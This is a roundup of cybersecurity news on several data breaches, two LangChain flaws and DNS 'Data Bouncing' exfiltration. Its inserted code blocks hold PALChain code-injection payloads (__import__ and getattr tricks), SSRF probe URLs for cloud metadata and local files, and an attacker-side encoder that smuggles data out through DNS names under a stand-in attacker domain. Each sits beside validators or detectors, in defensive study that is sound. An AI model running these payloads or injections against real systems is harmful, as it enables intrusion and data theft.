ERP Firm Data Breach Exposes Over 750 Million Records

A leading Enterprise Resource Planning (ERP) company based in Mexico inadvertently left an unsecured database online, exposing sensitive information on hundreds of thousands of users. This was discovered by cybersecurity researcher Jeremiah Fowler, who reported his findings to Website Planet. According to Fowler, the database contained 769 million records and was accessible to anyone who knew where to look.

The exposed data included highly sensitive and personally identifiable information such as API keys, secret keys, bank account numbers, tax identification numbers, and email addresses. The database, which is 395GB in size, belongs to ClickBalance, a software provider that offers a range of cloud-based business services including administration automation, accounting, inventory, and payroll.

Website Planet describes ClickBalance as one of Mexico’s largest ERP technology providers. Upon discovering the database, Fowler immediately contacted ClickBalance, which secured the database within hours. However, it remains unclear whether any malicious actors accessed the data before it was secured or whether the data has been used in any malicious activities. Fowler emphasizes that only a comprehensive forensic investigation can determine the full extent of the exposure.

The exposure of tax identification numbers and bank account details poses significant risks, enabling cybercriminals to conduct fraudulent activities. The theft of active email addresses is particularly concerning, as it allows criminals to launch phishing attacks that can deliver malware and ransomware.

Despite the severe potential consequences, unsecured databases continue to be a common cause of data breaches. Many large enterprises and government organizations have been found with online databases lacking adequate protection. For instance, a previous incident resulted in the personal information of the entire Brazilian population being leaked.

LangChain Gen AI Under Scrutiny: Experts Discover Significant Flaws

Researchers at Palo Alto Networks have identified two vulnerabilities, CVE-2023-46229 and CVE-2023-44467, in LangChain, an open-source framework for building generative AI applications that is developed on GitHub. CVE-2023-46229 is a Server-Side Request Forgery (SSRF) flaw: a component that fetches URLs on the user's behalf can be steered into making requests to hosts of the attacker's choosing, including hosts inside the network where LangChain runs.

LangChain versions before 0.0.317 are affected; the vulnerable code is the document_loaders/recursive_url_loader.py module. Because crawling can proceed from an external server to an internal one, an attacker who controls the starting page or the pages it links to can make the loader fetch internal services. That opens the door to unauthorized access to sensitive information, compromise of internal systems, and disclosure of internal data in the content the loader returns.

Organizations should apply the LangChain updates that address the SSRF issue. CVE-2023-44467 is a separate critical flaw in langchain_experimental, affecting LangChain versions 0.0.306 and older. It bypasses the fix for the earlier code-execution bug CVE-2023-36258: by using __import__ in the generated Python code, an attacker can execute arbitrary code, because the validation in pal_chain/base.py did not prohibit that call.

Under CVSS v3.1 the flaw carries a base score of 9.8 (CRITICAL) with an exploitability subscore of 3.9: it can be launched from the network with low attack complexity, requires no privileges and no user interaction, and has a high impact on confidentiality, integrity and availability.

Organizations should act promptly to protect their systems and data from exploitation of these vulnerabilities. LangChain versions before 0.0.317 are affected, and users and administrators of affected versions should update to the latest release immediately.

The first vulnerability the researchers describe is a critical prompt injection flaw in PALChain, a chain in the langchain_experimental package that has an LLM generate Python code to answer a query and then runs that code. It is tracked as CVE-2023-44467. The researchers exploited the from_math_prompt method, which translates the user's query into runnable Python code, by defeating the two security checks applied to that code.

Those two checks are meant to reject generated code that imports modules or executes commands. The researchers showed that even with both set to false, the validation failed to recognise the dangerous call, so code embedded in the user's query was executed by LangChain as if it were a legitimate solution. LangChain itself is an open-source library designed to make complex large language models (LLMs) easier to use.
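The following is an added example, not LangChain's own code, that reproduces the class of bypass described above in miniature. The "naive" validator is modelled loosely on the kind of AST check added for CVE-2023-36258 (it rejects `import` statements and a short list of os/subprocess calls); the hardened version also rejects `__import__`, `eval`/`exec`/`getattr`-style builtins and any dunder attribute access. The sample payloads are constructed; the flag names `allow_imports` and `allow_command_exec` are assumptions for illustration.

```python
import ast

# Attribute calls that the naive validator treats as command execution.
COMMAND_EXEC_CALLS = {
    ("os", "system"), ("os", "popen"), ("subprocess", "run"),
    ("subprocess", "Popen"), ("subprocess", "call"), ("subprocess", "check_output"),
}

# Builtins that give generated code a route to modules or code execution
# without ever writing an `import` statement.
DANGEROUS_NAMES = {
    "__import__", "eval", "exec", "compile", "open", "getattr", "setattr",
    "delattr", "globals", "locals", "vars", "breakpoint", "input",
}


def _import_or_exec_call(node, allow_imports, allow_command_exec):
    """True if `node` is something the naive check rejects."""
    if not allow_imports and isinstance(node, (ast.Import, ast.ImportFrom)):
        return True
    if (not allow_command_exec and isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)):
        base = node.func.value
        if isinstance(base, ast.Name) and (base.id, node.func.attr) in COMMAND_EXEC_CALLS:
            return True
    return False


def naive_validate(code, allow_imports=False, allow_command_exec=False):
    """Illustrative pre-fix style check: rejects `import` statements and a short
    list of os/subprocess calls, nothing else. Returns True if the code passes."""
    tree = ast.parse(code)
    return not any(_import_or_exec_call(n, allow_imports, allow_command_exec)
                   for n in ast.walk(tree))


def hardened_validate(code, allow_imports=False, allow_command_exec=False):
    """Also reject dangerous builtins, any dunder name or attribute (the route to
    __builtins__, __class__.__subclasses__() and friends) and getattr tricks.
    Still a denylist: treat it as defence in depth in front of a real sandbox."""
    tree = ast.parse(code)
    for node in ast.walk(tree):
        if _import_or_exec_call(node, allow_imports, allow_command_exec):
            return False
        if isinstance(node, ast.Name) and (node.id in DANGEROUS_NAMES or node.id.startswith("__")):
            return False
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            return False
    return True


def run_pal_solution(code, validator):
    """Mimic the PAL flow: validate, exec the generated code with no builtins,
    then call its solution() function. Raises ValueError if rejected."""
    if not validator(code):
        raise ValueError("generated code rejected by validator")
    namespace = {"__builtins__": {}}
    exec(code, namespace)
    return namespace["solution"]()


# Constructed samples: a benign LLM answer and three injected payloads.
BENIGN = "def solution():\n    apples = 12\n    return apples * 3\n"
DIRECT_IMPORT = "import os\ndef solution():\n    return os.system('id')\n"
DUNDER_IMPORT = "def solution():\n    return __import__('os').system('id')\n"
GETATTR_TRICK = "def solution():\n    return getattr(__builtins__, 'ex' + 'ec')('print(1)')\n"

if __name__ == "__main__":
    for name, code in [("benign", BENIGN), ("direct import", DIRECT_IMPORT),
                       ("__import__ bypass", DUNDER_IMPORT), ("getattr trick", GETATTR_TRICK)]:
        print(f"{name:18} naive={naive_validate(code)!s:5} hardened={hardened_validate(code)}")
    print("benign result:", run_pal_solution(BENIGN, hardened_validate))
```

The naive check passes both `DUNDER_IMPORT` and `GETATTR_TRICK`, which is exactly why a denylist on the AST cannot be the only control: Python offers too many ways to reach a module or a code object without the `import` keyword. The durable fix is to not execute model-generated code in the application's own interpreter at all, and to run it in an isolated sandbox if it must be executed.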

LangChain provides a multitude of composable building blocks, including connectors to models, integrations with third-party services, and tool interfaces usable by large language models (LLMs). Users can build chains using these components to augment LLMs with capabilities such as retrieval-augmented generation (RAG). This technique supplies additional knowledge to large language models, incorporating data from sources such as private internal documents, the latest news, or blogs. 

Application developers can leverage these components to integrate advanced LLM capabilities into their applications. Initially, during its training phase, the model relied solely on the data available at that time. However, by connecting the basic large language model to LangChain and integrating RAG, the model can now access the latest data, allowing it to provide answers based on the most current information available. 

LangChain has garnered significant popularity within the community. As of May 2024, it boasts over 81,900 stars and more than 2,550 contributors to its core repository. The platform offers numerous pre-built chains within its repository, many of which are community-contributed. Developers can directly use these chains in their applications, thus minimizing the need to construct and test their own LLM prompts. Researchers from Palo Alto Networks have identified vulnerabilities within LangChain and LangChain Experimental. 

The report provides a comprehensive analysis of these vulnerabilities. LangChain's website claims that over one million developers use its frameworks for LLM application development, and its partner packages include major names in cloud, AI, databases and other technology sectors. The two vulnerabilities identified could have allowed attackers to execute arbitrary code and access sensitive data.

LangChain has issued patches to address these issues. The report offers a thorough technical examination of the flaws and guidance on mitigating similar threats in the future. Palo Alto Networks encourages LangChain users to upgrade to the latest version so that these vulnerabilities are patched, and states that its customers benefit from enhanced protection against attacks using CVE-2023-46229 and CVE-2023-44467.

The Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced Threat Prevention, can identify and block command injection traffic. Prisma Cloud aids in protecting cloud platforms from these attacks, while Cortex XDR and XSIAM protect against post-exploitation activities through a multi-layered protection approach. Precision AI-powered products help to identify and block AI-generated attacks, preventing the acceleration of polymorphic threats. 

One vulnerability, tracked as CVE-2023-46229, affects a LangChain feature called SitemapLoader, which scrapes content from the URLs listed in a sitemap and compiles it into Document objects. The vulnerability arises from SitemapLoader's willingness to retrieve every URL it is given: a supporting utility called scrape_all fetches each URL without filtering or sanitising the list. A malicious actor can therefore include URLs pointing to intranet resources in the sitemap, resulting in server-side request forgery and the leakage of sensitive data when the content from those URLs is fetched and returned.

Researchers indicated that threat actors could exploit this flaw to extract sensitive information from limited-access application programming interfaces (APIs) of an organization or other back-end environments that the LLM interacts with. To mitigate this vulnerability, LangChain introduced a new function called extract_scheme_and_domain and an allowlist to enable users to control domains. 
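Below is an added example, not LangChain's code, of the shape the fix takes: parse the sitemap, extract scheme and host from each URL, and fetch only URLs that are http(s), not literal internal addresses, and within an allowlist of domains. The sitemap is constructed, and my `extract_scheme_and_domain` is an assumption about how such a helper behaves rather than a copy of LangChain's function of that name.

```python
import ipaddress
import xml.etree.ElementTree as ET  # for untrusted sitemaps prefer defusedxml in production
from urllib.parse import urlparse

SITEMAP_NS = "{http://www.sitemaps.org/schemas/sitemap/0.9}"


def extract_scheme_and_domain(url):
    """Return (scheme, hostname), both lower-cased. urlparse().hostname drops the port
    and any userinfo, so https://example.com@evil.example.net/ yields evil.example.net."""
    parsed = urlparse(url)
    return parsed.scheme.lower(), (parsed.hostname or "").lower()


def is_internal_address(host):
    """True for literal IPs that are loopback, private, link-local (169.254.x.x, the cloud
    metadata range), reserved, multicast or unspecified. Hostnames return False here:
    resolve them at fetch time and re-check the resolved address (DNS rebinding)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def url_allowed(url, allowed_domains):
    scheme, host = extract_scheme_and_domain(url)
    if scheme not in ("http", "https") or not host:
        return False
    if is_internal_address(host):
        return False
    # Exact match or subdomain of an allowlisted domain; "notexample.com" does not match.
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def parse_sitemap_locs(xml_text):
    root = ET.fromstring(xml_text)
    return [loc.text.strip() for loc in root.iter(SITEMAP_NS + "loc") if loc.text]


def filter_sitemap_urls(xml_text, allowed_domains):
    """Split the sitemap's URLs into (allowed, rejected) before anything is fetched."""
    allowed, rejected = [], []
    for url in parse_sitemap_locs(xml_text):
        (allowed if url_allowed(url, allowed_domains) else rejected).append(url)
    return allowed, rejected


# Constructed sitemap mixing legitimate pages with SSRF probes an attacker might plant.
SAMPLE_SITEMAP = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://example.com/page1</loc></url>
  <url><loc>https://docs.example.com:8443/guide</loc></url>
  <url><loc>http://169.254.169.254/latest/meta-data/iam/</loc></url>
  <url><loc>http://localhost:9200/_cat/indices</loc></url>
  <url><loc>http://[::1]:8080/admin</loc></url>
  <url><loc>http://10.0.0.5/internal</loc></url>
  <url><loc>file:///etc/passwd</loc></url>
  <url><loc>https://example.com@evil.example.net/</loc></url>
  <url><loc>https://notexample.com/</loc></url>
</urlset>
"""

if __name__ == "__main__":
    ok, bad = filter_sitemap_urls(SAMPLE_SITEMAP, {"example.com"})
    print("allowed:", ok)
    print("rejected:", bad)
```

The allowlist is the primary control; the literal-IP check only catches the obvious probes, and names such as `localhost` or hostnames that resolve to internal addresses are rejected here because they are not allowlisted, not because they were recognised as internal.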

Both Palo Alto Networks and LangChain urged immediate patching, particularly as companies hasten to deploy AI solutions. It remains unclear whether threat actors have exploited these flaws. LangChain did not immediately respond to requests for comment.

Sensitive Health Data of 12.9 Million Individuals Stolen in Cyberattack

A single data breach at MediSecure, one of Australia's leading electronic prescription providers, has exposed personal and medical data belonging to 12.9 million people. The affected data relates to prescriptions distributed through the company's systems between March 2019 and November 2023.

MediSecure said that 12.9 million customer records were stolen and that an unknown portion of them has been posted online. The company first learned of the breach on April 13, when servers holding sensitive personal and health data were found to be infected with suspected ransomware, and publicly confirmed the hack in May.

Based on an investigation of the metadata accessed by the attackers in May 2024, MediSecure determined that 12.9 million individuals who used the service for prescription delivery between March 2019 and November 2023 were affected.

The same database stores information about patient prescriptions. The analysis, published on July 18, examined the healthcare identifiers involved in detail. The dataset covers a wide range of personal and health information, some of it sensitive by nature.

The personal information involved includes name, title, date of birth, gender, email address, home address and phone number. The health-related fields include the Individual Healthcare Identifier (IHI); Medicare card number; Commonwealth Seniors card number and expiry date; Healthcare Concession card number and expiry date; Department of Veterans' Affairs (DVA) card number and expiry date; and prescription details, including the drug name, strength, quantity, number of repeats and the reason for the prescription.

The Department of Home Affairs has published a statement with details about the breach, together with links that help victims recognise scammers, protect their personal information and find further guidance. A support program, including mental health care, is in place for those distressed by the attack.

Prescribing was not affected: healthcare providers were still able to prescribe and dispense medicines. Meanwhile, the cost of another major breach, this time at a US healthcare company, is still being tallied: a third of Americans may be affected by the ransomware attack on Change Healthcare.

That would amount to roughly 110 million individuals, dwarfing the 2015 Anthem attack, which involved the personal records of 78.8 million people. According to The HIPAA Journal, the projected cost of addressing the February cyberattack on Change Healthcare is between $2.3 billion and $2.45 billion.

This figure, however, does not account for the expenses associated with notifying all affected customers. These cyberattacks have left millions of individuals justifiably worried that their personal information may be accessible to malicious entities who could repeatedly exploit it for fraudulent purposes.

Additionally, these incidents have significantly undermined public trust in medical providers, who are entrusted with some of the most sensitive personal details. The ramifications of these breaches extend beyond financial losses, eroding confidence in the security measures of healthcare institutions tasked with safeguarding patient information.

60 Million Users Exposed: The Pinterest Data Breach Explained

Pinterest, the popular image-sharing platform with over 518 million monthly active users, faces a potential data leak that could affect millions of users. A hacker known as “Tchao1337” has allegedly leaked a database containing 60 million rows of Pinterest user data on a popular data leak forum.

The breach details

The leaked database, which reportedly contains 6 million records, has been compressed to a file size of 1.59 gigabytes. While the full extent of the exposed information is unknown, the leaked data includes email addresses, usernames, user IDs, and IP addresses.

The first and most obvious action is to change your Pinterest password and the password of the email account linked to it. Even a few leaked details let attackers piece together more information and cause you real difficulties.

You already know not to reuse the same password across services. If you have, change it everywhere and use a password manager to generate strong passwords you do not have to remember. Enable two-factor authentication for an extra layer of protection.

Stay cautious: Phishing

If your data has been hacked, you are likely to become the victim of other phishing efforts. Be cautious when clicking dodgy links, and not simply in messages on your Pinterest account. 

When using your email account, use caution; any communication that does not appear to come from a known source may be a hoax. Attachments should be treated with caution since they could contain malware. 

A VPN with built-in threat protection may help against phishing sites. NordVPN and Surfshark bundle malware and phishing blocking with their subscriptions; NordVPN's Threat Protection Pro is its anti-phishing feature.

Currently, Pinterest has not issued an official statement regarding the reported hack. The Cyber Press team has contacted Pinterest to warn them of the data leak and is awaiting their response.

If proven, this data leak might have serious ramifications for Pinterest. The company may incur significant operating costs in investigating the hack and alerting affected users.

As the issue evolves, users should actively check their accounts and look for any formal statements from Pinterest regarding the potential data loss.

Be careful while sharing your data

The best way to avoid becoming a victim of a data breach is to be careful about what personal information you disclose. Give websites only what they need. A VPN blocks many trackers and encrypts traffic between your device and the VPN server, so an attacker on the local network cannot read it; reputable providers also keep no-logs policies, which limits what could be obtained from the provider itself. None of this protects data a service has already collected, which is what a breach exposes.

Activist Hacking Group Claims Leak of Disney’s Internal Data

An activist hacking group has alleged that it leaked a substantial amount of Disney's internal communications, including details about unreleased projects, raw images, computer code, and some login credentials.

The group, known as Nullbulge, has claimed responsibility for the breach, asserting that it obtained approximately 1.2 terabytes of data from Disney’s Slack, a popular messaging platform. In an email sent to CNN on Monday, Nullbulge explained that they gained access through “a man with Slack access who had cookies.” The email also indicated that the group is based in Russia.

According to Nullbulge, the user initially attempted to remove them but allowed them to re-enter before the second breach. CNN was unable to independently verify these claims.

Disney issued a statement on Monday, acknowledging the situation and stating that it “is investigating this matter.” The company’s extensive operations span various divisions and platforms, including ESPN, Hulu, Disney+, and ABC News.

The hacking group stated their motivations included concerns about how Disney manages artist contracts and its approach to artificial intelligence (AI), along with what they described as the company's disregard for consumer interests.

Nullbulge had been teasing this major leak over recent weeks on social media. For instance, in June, they posted on X what appeared to be visitor, booking, and revenue data from Disneyland Paris.

The issue of AI has been a contentious topic in recent labor disputes, notably during the Screen Actors Guild and the Writers Guild of America strikes. Writers are worried that AI could replace them in scriptwriting, while actors fear that CGI might entirely replace their roles.

The hackers mentioned that they chose to leak the data rather than negotiate with Disney. “If we said ‘Hello Disney, we have all your Slack data,’ they would immediately lock down and attempt to neutralize us. In a confrontation, it’s better to act first,” the email stated.

This incident recalls the 2014 Sony Pictures hack, which, linked to North Korea, resulted in an international crisis by exposing company emails, celebrity aliases, social security numbers, and entire movie scripts.

AT&T Paid Attackers $370K to Delete Stolen Customer Data

AT&T reportedly paid a hacker more than $370,000 to remove stolen customer data. In an extraordinary turn of events, the ransom may not have gone to those responsible for the breach.

Last Friday, AT&T disclosed that an April data breach had exposed the call and text records of "nearly all" of its customers, including phone numbers and call counts. In a filing with the Securities and Exchange Commission (SEC), AT&T said it has since tightened its cybersecurity measures and is working with law enforcement to investigate the incident.

It now appears that AT&T has taken additional steps in response to the intrusion. According to Wired, AT&T paid a ransom of 5.7 bitcoin to a member of the hacking group ShinyHunters in mid-May, which was worth little more than $373,000 at the time. In exchange for this money, the hacker allegedly deleted the stolen data from the cloud server where it was stored, as well as providing video footage of the act. 

However, there is no guarantee that the millions of people affected by the latest massive AT&T attack will be entirely safe, as digital data can be easily copied. The security expert who mediated negotiations between AT&T and the hacker told Wired that they believe the only complete copy of the stolen dataset was wiped. However, partial fragments may remain at large. 

Before AT&T's announcement, it emerged that Santander Bank and Ticketmaster had also been breached using stolen login credentials for accounts on the cloud data platform Snowflake. According to Wired, after the Ticketmaster breach the attackers may have used a script to hit more than 160 Snowflake customers at once.

AT&T Data Breach: Essential Steps for Victims to Protect Themselves

Telecom giant AT&T recently disclosed a massive data breach affecting nearly all of its approximately 110 million customers. If you were a customer between May 2022 and January 2023, there is a high chance your data, including call and text message records, was accessed through an illegal download from a third-party cloud platform. Customers should watch for contact from AT&T or check their accounts for notifications. First, change your password. 

AT&T's disclosure covers call and text metadata rather than passwords, but the incident is a good prompt to update the password on your AT&T account and on any other account where you reused it. Using a different password for each service is inconvenient but essential; password generators create strong random passwords and a password manager remembers them for you. Also enable two-factor authentication on your AT&T account and on any account that shared the same password, since combining two login factors makes a stolen password far less useful. Given the nature of this leak, consider changing your mobile number as well. Expect more spam calls, but the bigger concern is targeted scams from people who now know whom you call and text.

Be extra cautious about giving out personal details such as banking information or your address over the phone, as these could be cleverly disguised phishing schemes. Stay vigilant online, as even anonymous phone number information can be pieced together by scammers to identify individuals. Treat every email from unfamiliar addresses as suspicious. Additionally, inform your bank about the breach. They can monitor for any suspicious transactions and introduce new security measures to ensure you are contacting your bank, not an imposter.  

Lastly, a VPN can add some protection for your online traffic: it masks your IP address and encrypts traffic between your device and the VPN server, though it does nothing for data your carrier already holds. There are free plans such as ProtonVPN. Many VPNs bundle antivirus features; NordVPN's Threat Protection Pro, for instance, is aimed at blocking phishing sites. A Surfshark One subscription includes antivirus software and an Alternative ID feature that lets you sign up for services with randomly generated details, including a decoy phone number, so you can create accounts for less trustworthy services (or frequently attacked ones, like AT&T) with less exposure.

This way, you can minimize spam and rest assured that if your details get leaked, you haven’t actually been compromised. Hackers will have nothing to piece together; you can simply disconnect that ID, generate another random identity, and move on securely.

New Hacking Method: Akamai DNS Data Exfiltration

When it comes to cybercrime, getting into a system is only half the battle; the real challenge is extracting the stolen data without being detected. Companies often focus on preventing unauthorised access, but they must also ensure that data doesn’t slip out undetected. Hackers, driven by profit, constantly innovate methods to exfiltrate data from corporate networks, making it essential for businesses to understand and defend against these techniques.

The Challenge of Data Exfiltration

Once hackers breach a network, they need to smuggle data out without triggering alarms. Intrusion Detection Systems (IDS) are crucial in this fight. They monitor network traffic and system activities for suspicious patterns that may indicate unauthorised data extraction attempts. IDS can trigger alerts or even automatically block suspicious traffic to prevent data loss. To avoid detection, hackers use obfuscation techniques to disguise their actions. This can involve encrypting data or embedding it within harmless-looking traffic, making it difficult for IDS to identify and block the exfiltration attempts.

Reality vs. Hollywood

In Hollywood movies like "Mission Impossible," data theft is often depicted as a physical heist involving stealth and daring. In reality, hackers prefer remote methods to avoid detection and the risk of getting caught. By exploiting vulnerabilities in web servers, hackers can gain access to a network and search for valuable data. Once they find it, the challenge becomes how to exfiltrate it without triggering security systems.

One common way hackers hide their tracks is through obfuscation. A well-known method of obfuscation is image steganography, where data is embedded within images. This technique allows small amounts of data, such as passwords, to be hidden within images without raising suspicion. However, it is impractical for large datasets due to its low bandwidth and the potential for triggering alarms when numerous images are sent out.

Innovative DNS Data Exfiltration

The Domain Name System (DNS) is essential for internet functionality, translating domain names into IP addresses. Attackers can abuse it by encoding data into the hostnames they ask to resolve, so that each query carries a fragment of the stolen data to a DNS server they control. In a corporate network, DNS traffic is typically logged and inspected, and hosts are usually restricted to the internal resolver, so queries for an unfamiliar attacker domain stand out or are blocked outright. A newer method known as "Data Bouncing" sidesteps this by getting a trusted third party to issue the DNS query instead.

How Data Bouncing Works

Data Bouncing leverages trusted web hosts to perform DNS resolution on the attacker's behalf. The attacker sends an HTTP request to a reputable domain, such as "bbc.co.uk", with a forged "Host" header containing the attacker's domain. Akamai Ghost HTTP servers, which resolve the domain named in the Host header, process the request and unwittingly perform the lookup.

Every HTTP request a browser makes includes metadata in its headers. One of these fields is "Host", which names the domain being requested. Normally, if you ask for a domain that the server's IP address does not host, you get an error. Akamai Ghost servers, however, issue a DNS request to resolve the domain you asked for, even when it is outside their network. So a request to a trusted domain like "bbc.co.uk" with a Host header of "encryptedfilechunk.attackerdomain.com" causes the trusted edge to perform the DNS resolution for you. The stolen data travels in the hostname labels, and the attacker reads it from the query log of the authoritative DNS server for attackerdomain.com. From the victim network's perspective, the only observable traffic is an HTTP request to a well-known site; no DNS query for the attacker's domain ever leaves the network.
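As an added example (not from the original post or from the Data Bouncing researchers), the block below shows both halves of the technique described above: the attacker side, which chunks data into DNS-safe hostnames under an attacker domain and builds the bounce request with the spoofed Host header, and the defender side, which cannot rely on DNS logs and instead inspects outbound HTTP Host headers for the two signals this trick leaves behind, a Host that does not match the TLS server name, and long high-entropy labels. The secret, the attacker domain, the front host and the proxy log records are all constructed; nothing is sent on the network.

```python
import base64
import hashlib
import math
from collections import defaultdict

MAX_LABEL_OCTETS = 63
MAX_NAME_OCTETS = 253


def encode_exfil_names(data, attacker_domain, chunk_size=30):
    """Split `data` into hostnames <seq>.<base32-chunk>.<attacker_domain>.
    30 raw bytes become 48 base32 characters, under the 63-octet label limit."""
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        label = base64.b32encode(data[offset:offset + chunk_size]).decode().rstrip("=").lower()
        name = f"{seq}.{label}.{attacker_domain}"
        if len(label) > MAX_LABEL_OCTETS or len(name) > MAX_NAME_OCTETS:
            raise ValueError("chunk too large for a DNS name")
        names.append(name)
    return names


def decode_exfil_names(names, attacker_domain):
    """What the attacker's authoritative DNS server does with its query log:
    keep names under its own domain, order by the sequence label, re-pad base32."""
    chunks = {}
    suffix = "." + attacker_domain
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, label = name[: -len(suffix)].split(".", 1)
        chunks[int(seq)] = base64.b32decode(label.upper() + "=" * (-len(label) % 8))
    return b"".join(chunks[k] for k in sorted(chunks))


def build_bounce_request(exfil_name, path="/"):
    """Raw HTTP/1.1 request. It would be sent to the trusted front host's IP address,
    but the Host header names the attacker-controlled name that the edge then resolves.
    Built here for inspection only, never sent."""
    return f"GET {path} HTTP/1.1\r\nHost: {exfil_name}\r\nConnection: close\r\n\r\n".encode()


# Defender side: the victim network never sees the DNS query, only the HTTP request.

def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(name):
    # Two-label approximation; use a public-suffix list in production.
    return ".".join(name.split(".")[-2:])


def flag_bounce_requests(records, min_label=30, min_entropy=3.5):
    """records: dicts with 'sni' (TLS server name, may be None) and 'host' (HTTP Host
    header), as a proxy or TLS-inspection log would provide. Flags a request when the
    Host header's registered domain differs from the SNI's, or when a Host label is
    long and high-entropy, which is what encoded chunks look like."""
    flagged = []
    for r in records:
        host = r["host"].lower()
        reasons = []
        if r.get("sni") and registered_domain(r["sni"].lower()) != registered_domain(host):
            reasons.append("host/sni mismatch")
        if any(len(lbl) >= min_label and shannon_entropy(lbl) >= min_entropy
               for lbl in host.split(".")):
            reasons.append("high-entropy label")
        if reasons:
            flagged.append((host, reasons))
    return flagged


# Constructed inputs: a pseudo-random 128-byte "secret" and a few proxy log records.
SECRET = b"".join(hashlib.sha256(b"constructed secret %d" % i).digest() for i in range(4))
ATTACKER_DOMAIN = "attacker.example"
EXFIL_NAMES = encode_exfil_names(SECRET, ATTACKER_DOMAIN)
SAMPLE_RECORDS = [
    {"sni": "www.bbc.co.uk", "host": "www.bbc.co.uk"},
    {"sni": "static.example.org", "host": "static.example.org"},
    {"sni": "www.bbc.co.uk", "host": EXFIL_NAMES[0]},   # the bounce request
    {"sni": None, "host": "intranet.corp.local"},
]

if __name__ == "__main__":
    print(build_bounce_request(EXFIL_NAMES[0]).decode())
    print("round trip ok:", decode_exfil_names(EXFIL_NAMES, ATTACKER_DOMAIN) == SECRET)
    for host, reasons in flag_bounce_requests(SAMPLE_RECORDS):
        print("FLAG", host, reasons)
```

The Host/SNI mismatch is only visible where the proxy terminates TLS or the request is plain HTTP; without inspection, the defender's remaining lever is to force all outbound web traffic through a proxy and alert on Host values whose labels look like encoded data rather than names.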

To prevent data exfiltration, companies need a comprehensive security strategy that includes multiple layers of defence. This makes it harder for hackers to succeed and gives security teams more time to detect and stop them. While preventing intrusions is crucial, detecting and mitigating ongoing exfiltration attempts is equally important to protect valuable data.

As cyber threats take new shapes, so must our defences. Understanding sophisticated exfiltration techniques like Data Bouncing is essential in the fight against cybercrime. By staying informed and vigilant, companies can better protect their data from falling into the wrong hands.

Microsoft Faces Criticism Over Data Breach Notification Emails

Microsoft recently began notifying some customers via email about a potential data breach that might have compromised their personal information. However, the company's approach has faced heavy criticism, with many saying the emails resembled spam or phishing attempts.

Cybersecurity researcher and former Microsoft employee Kevin Beaumont addressed the issue on LinkedIn, reassuring followers that the emails were legitimate, though poorly executed:

"Microsoft experienced a breach by Russia affecting customer data but did not follow the Microsoft 365 customer data breach protocol. Instead of using the portal, they emailed tenant admins," Beaumont explained. "These emails can end up in spam, and tenant admin accounts are meant to be secure, breakglass accounts without email. They also failed to notify organizations via account managers. You should review all emails dating back to June. This is a widespread issue."

One major concern noted by TechCrunch was the inclusion of a "secure link" in the emails, which directed recipients to a domain that did not seem related to Microsoft: "purviewcustomer.powerappsportals.com."

"Essentially, the critical alert looks like a phishing attack," one recipient commented on X. Many recipients shared this sentiment; the link was submitted to urlscan.io, a service that analyses whether a website is malicious, more than a hundred times.

Additionally, Microsoft's support portal contains several posts from customers seeking confirmation of the emails' legitimacy.

"This email has several red flags for me," one person wrote. "The request for the TenantID and admin or high-level email addresses, the barebones powerapps page, and some quick Googling not yielding any related results to the email's title or contents. Can anyone confirm if this is a legitimate Microsoft email request?"

Data Breach Exposes Millions of mSpy Spyware Customers

A data breach at the phone surveillance operation mSpy has exposed the personal information of millions of customers who bought the phone spyware app over the past decade, and has exposed the Ukrainian company behind it.

In May 2024, unknown attackers stole millions of customer support tickets, which included personal information, support emails, and attachments containing personal documents from mSpy. While hacks of spyware vendors are becoming increasingly common, they remain significant due to the highly sensitive personal data involved, including that of the service's customers.

The breach affected customer service records dating back to 2014, stolen from the spyware maker’s Zendesk-powered customer support system.

mSpy is a phone surveillance app marketed as a tool to track children or monitor employees. However, like most spyware, it is frequently used to monitor people without their consent. These apps are also known as "stalkerware" because they are often used by individuals in romantic relationships to surveil their partners without permission.

The mSpy app allows the person who installed the spyware, typically someone with prior physical access to the victim’s phone, to remotely view the phone’s contents in real-time.

As is common with phone spyware, mSpy’s customer records include emails from individuals seeking assistance to secretly track the phones of their partners, relatives, or children. TechCrunch’s review of the data, which was independently obtained, revealed that some emails and messages came from high-ranking U.S. military personnel, a serving U.S. federal appeals court judge, a U.S. government department’s watchdog, and an Arkansas county sheriff’s office requesting a free license to trial the app.

Despite the vast number of customer service tickets leaked, the data is believed to represent only a fraction of mSpy’s total customer base who contacted customer support. The actual number of mSpy customers is likely much higher.

Cyber Criminals Siphoned 'Almost All' of AT&T's Call Logs Over Six Months

Hackers accessed AT&T's data storage platform in April, stealing metadata from "nearly all" call records and messages sent by users over a six-month period in 2022. AT&T filed paperwork with the Securities and Exchange Commission (SEC) on Friday, stating that it learned of the incident on April 19.

The company revealed to a local media outlet that the breach took place via the third-party cloud platform Snowflake, a data storage giant plagued by hackers who have attacked some of the company's most notable clients and released data affecting hundreds of millions of individuals. An investigation revealed the attacker stole files from AT&T's Snowflake account between April 14 and April 25.

When asked why the attacker was still able to access the Snowflake account nearly a week after AT&T detected the issue, the spokesman stated that it "took time to investigate the claim of a breach, determine its source, isolate the impacted data, and close off the illegal access point." 

The spokesperson stated that the hackers took "aggregated metadata" regarding calls or messages, not the content of the talks. AT&T has the most wireless subscribers in the United States, far more than rivals Verizon and T-Mobile. 

According to an annual report for 2022, the incident affected around 109 million people's accounts. The telecom giant believes the hacker stole "files containing AT&T records of customer call and text interactions" from around the beginning of May 2022 to the end of October, as well as on January 2, 2023.

The hack impacted "records of calls and texts of nearly all of AT&T's wireless customers and customers of mobile virtual network operators (MVNO) using AT&T's wireless network." 

“These records identify the telephone numbers with which an AT&T or MVNO wireless number interacted during these periods, including telephone numbers of AT&T wireline customers and customers of other carriers, counts of those interactions, and aggregate call duration for a day or month,” the company noted in the SEC filing. 

“For a subset of records, one or more cell site identification number(s) are also included. While the data does not include customer names, there are often ways, using publicly available online tools, to find the name associated with a specific telephone number.” 

